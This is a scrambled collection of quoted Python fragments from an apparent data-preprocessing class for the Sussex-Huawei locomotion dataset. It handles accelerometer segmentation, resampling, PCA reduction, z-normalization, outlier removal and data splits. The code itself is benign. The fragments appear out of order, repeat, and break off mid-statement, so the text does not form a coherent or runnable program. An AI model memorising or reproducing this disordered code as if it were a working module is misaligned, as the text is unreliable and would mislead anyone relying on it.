self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels )", "datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments =", "@0.95 for classical approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns)", "list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data,", "columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str)", "PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index", "mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2],", "= ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train", "is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "data): \"\"\" Combines labels vector and data matrix. 
:param labels: :param data: :return:", "data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return", "Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns])", ") print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train", "= self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs'", "if data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row')", "axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val':", "\"\"\" Apply all preprocessing steps necessary for training. 
:param data: pandas.DataFrame :param params:", "for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than", "is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "= split(data, segment_length) if not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))", "return data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names #", "isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode", "ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced], axis=1) data", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param", "mode, args=None): \"\"\" Project accelerometer data from local vehicle coordinates to a global", "#data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = 
self.remove_nans(data_test, replacement_mode='del_row')", "Desegements as time series. :param data_segments: :param selected_columns: :param axis: :return: \"\"\" try:", "replacement_mode == 'quantile': # Source for next 7 lines of code after comment:", "isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data),", "str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if", "ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1.", "@overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative data. 
:param", "replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data,", "if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is None or", "project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data from local vehicle coordinates", ":return: \"\"\" try: if data is None or mode is None or columns", "if data is None or mode is None or columns is None: raise", ":param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels =", "print('Train, Test, Validation split') data_len = data.shape[0] test_len = int(data_len * test_sz) train_len", "inplace=True) old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data if", "else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError,", "pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index =", "road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment", "[] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for", "= data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1) data =", 
"or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except", "config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column", "columns = None): \"\"\" Apply a dimensionality reduction technique to a data set.", "for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate", "data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train =", "is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise", "range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif", "data, mode, label_column=None, args=None): \"\"\" Segements a time series based on a label", "is None and std is None: if columns is not None: mean =", "column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data raise", "data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid =", "smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = 
data_test['acceleration_abs'].rolling(5, min_periods=1,", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or", "args[0] aggregate = args[1] exact_length = args[2] segments_aggregated = [] split = lambda", "data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise", "data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'pca': # Source: #", "return segments #3. Remove segments that are too long or too short after", "None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is", "Resamples quantitative data. :param data: :param freq: :param mode: :return: \"\"\" # Source:", ":param data: :return: \"\"\" try: if data is None or labels is None:", "'1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans') data", "= segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None:", "or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if", "in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is", "\"\"\" print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] 
train_sz = config['pre_proc_training_sz']", "mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns:", "/ std else: data = (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "data[columns].mean()) / data[columns].std() else: mean = data.mean() std = data.std() data = (data", "replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as value if", ") data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data", "coordinates to a global coordinate system. :param data: :param target_columns: :param mode: :param", "segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length),", "# https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index", "alternative old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name})", "motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id']", ":param data: :param columns: :param mean: :param std: :return: \"\"\" try: if data", "https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = 
data[column] * (data[args[ind]]", ":param data: :param replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\" try:", "'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced =", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError):", "selected_columns=None, axis = 0): \"\"\" Desegements as time series. :param data_segments: :param selected_columns:", "os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps to", "replacement_mode): \"\"\" Remove rows that have an unwanted label. :param data: :param unwanted_labels:", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None: return data.resample(freq).mean() if", "via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid =", "try: if data is None or mode is None or reduced_column_name is None:", "if data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "try: if data is None or mode is None or columns is None:", "axis = 0): \"\"\" Desegements as time series. :param data_segments: :param selected_columns: :param", "Change representation of a data set. 
:param current_representation: :param target_representation: :param data: :return:", "(data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "= self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data", "sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self,", ":param column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try:", "columns is not None: mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns]", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(", "pipeline.feature_engineering.preprocessing.abstract_preprocessor import Preprocessor from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy", "return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode ==", "data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = 
data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test", "'replacement_val', 'delet_row' :param replacement_value: any type, used as value if replacment_mode is 'default_val'", "target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "data segments_combined = None for segment in min_length_subsegements: segment = segment.reset_index() segment.index =", "encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in", "data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical", "None: if columns is not None: data[columns] = (data[columns] - mean) / std", "not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else: data =", "data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label',", "data. 
:param data: :param freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html", "approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None):", "global coordinate system. :param data: :param target_columns: :param mode: :param args: :return: \"\"\"", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "set. :param data: :param columns: :return: \"\"\" try: if data is None: raise", "if data is None or mode is None or reduced_column_name is None: raise", ":param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data", "os import pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self):", "not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "__init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time", "segments_aggregated = [] split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size", "is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else: 
data", "data is None or target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical", "self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments", "https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative", "== 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError,", ":param mean: :param std: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for", "mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier", "threshold: :return: \"\"\" try: if data is None or replacement_mode is None or", 
"self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach via", "isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function':", "splitting min_length_subsegements = [] for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment)", ") for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label',", "is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] #", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self,", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns,", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name,", "self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments =", "TS Fresh )[:-1] return data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply", "reduced_column_name='acceleration_abs' ) #Test for ind in 
range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], #", ":param data: :param target_columns: :param mode: :param args: :return: \"\"\" try: if data", "unit): \"\"\" Converts unix time stamps to date time. :param data: :param column:", "# works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str):", ")[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()]", "std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\" try: if data is", "= self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach", "or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "# #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] /", "for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality(", "= data[column] * (data[args[ind]] / 
data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row':", "- mean) / std else: data = (data - mean) / std else:", "lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values", "data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self,", ":param encoding_function: :return: \"\"\" try: if data is None or mode is None", "args=None): \"\"\" Segements a time series based on a label column, semantic segementation", "enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data =", "data, mode, columns, encoding_function): \"\"\" Encode categorical features using an encoding function. 
:param", "range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif", "group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode ==", "nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True)", "all preprocessing steps necessary for training. :param data: pandas.DataFrame :param params: List :return:", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise", "# https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group", "= data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make", "config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels =", "replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean = data.mean() std =", "# works better than 
euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal')", "'reduced', columns = None): \"\"\" Apply a dimensionality reduction technique to a data", "via TS Fresh )[:-1] return data @overrides def training_split_process(self, data, config, labels): \"\"\"", "columns is not None: data[columns] = (data[columns] - mean) / std else: data", "freq, mode = None): \"\"\" Resamples quantitative data. :param data: :param freq: :param", "pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample')", "data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99", "reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return", "a time series based on a label column, semantic segementation of a fixed", "or mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "classical approach via TS Fresh )[:-1] return data @overrides def training_split_process(self, data, config,", "/ data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data =", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or 
not isinstance(mode, str) or not isinstance(target_columns, list):", "substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs']", "data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", ":return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz =", "= self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train,", "'default_val' :return: pandas.DataFrame \"\"\" try: if data is None or replacement_mode is None:", "7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers", "replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "try: data = None for ind in range(len(data_segments)): if data is None: data", "data = data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "= 